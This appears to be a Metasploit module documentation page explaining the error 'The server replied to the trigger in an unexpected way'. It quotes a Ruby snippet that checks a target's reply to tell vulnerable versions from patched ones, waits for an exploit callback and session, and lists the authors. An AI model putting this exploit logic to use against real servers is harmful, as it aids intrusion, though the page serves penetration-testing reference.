141:	    msg = res.get_json_document.dig('meta', 'msg')
142:	    if res.code == 400 && msg == 'api.err.Invalid' # returned by versions before 5.13.29
143:	      fail_with(Failure::NotVulnerable, 'The target is not vulnerable')
144:	    end
145:	
146:	    unless res.code == 400 && msg == 'api.err.InvalidPayload' # returned by versions after 5.13.29 (including patched ones)
147:	      fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way')
148:	    end

The server replied to the trigger in an unexpected way


Here is a relevant code snippet related to the "The server replied to the trigger in an unexpected way" error message:

142:	    if res.code == 400 && msg == 'api.err.Invalid' # returned by versions before 5.13.29
143:	      fail_with(Failure::NotVulnerable, 'The target is not vulnerable')
144:	    end
145:	
146:	    unless res.code == 400 && msg == 'api.err.InvalidPayload' # returned by versions after 5.13.29 (including patched ones)
147:	      fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way')
148:	    end
149:	
150:	    wait_until { @search_received && (!handler_enabled? || session_created?) }
151:	    handler
152:	  ensure

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Spencer McIntyre
  • RageLtMan <rageltman[at]sempervictus>
  • Nicholas Anastasi

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.